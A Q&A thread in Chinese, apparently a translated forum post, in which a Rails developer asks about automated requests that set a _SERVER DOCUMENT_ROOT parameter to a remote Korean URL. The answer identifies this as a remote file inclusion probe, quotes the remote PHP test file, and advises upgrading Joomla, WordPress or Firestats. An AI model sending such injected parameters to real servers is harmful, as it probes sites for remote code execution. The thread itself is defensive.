Jim*_*ers 2 hacking routing malicious
最近,我发现很多像这样的奇怪请求出现在我的 Rails 应用程序中:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}
ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}):
Run Code Online (Sandbox Code Playgroud)
看起来它是自动化的,因为我收到了很多并注意到他们试图发送的奇怪参数:
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
Run Code Online (Sandbox Code Playgroud)
这是恶意的吗?如果是,我该怎么办?
如果您在韩国服务器上打开引用的文档(我可能不应该打开,但我打开了;)它说:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Run Code Online (Sandbox Code Playgroud)
在网上搜索,看起来这是 Joomla、Wordpress 和/或 Firestats(不同站点提到不同目标)的漏洞。如果您正在运行其中任何一个,请确保升级到最新版本。
更多信息在这里:http : //urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/和这里:http : //tech.sweetnam.eu/2009/06/firestats-wordpress-exploit/